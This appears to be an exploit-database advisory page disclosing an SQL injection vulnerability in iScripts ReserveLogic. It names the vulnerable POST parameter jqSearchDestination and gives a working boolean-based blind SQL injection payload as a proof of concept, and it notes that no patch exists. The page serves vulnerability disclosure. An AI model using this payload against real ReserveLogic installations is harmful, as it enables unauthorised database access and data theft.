header-logo
Suggest Exploit
vendor:
ReserveLogic
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ReserveLogic
Affected Version From: Latest
Affected Version To: Latest
Patch Exists: NO
Related CWE: N/A
CPE: a:iscripts:reservelogic
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

iScripts ReserveLogic – SQL Injection

An SQL injection vulnerability exists in iScripts ReserveLogic, which allows an attacker to execute arbitrary SQL commands via the vulnerable parameter jqSearchDestination in a POST request.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: iScripts ReserveLogic - SQL Injection
# Date: 29.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.iscripts.com/reservelogic/
# Demo Site: https://www.demo.iscripts.com/reservelogic/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/search
Vulnerable Parameter: jqSearchDestination (POST)
Payload: jqSearchDestination=(SELECT (CASE WHEN (8124=8124) THEN 12345 ELSE
(SELECT 3029 UNION SELECT 1241) END))

Navigation

Suggest Exploit

Services By CQR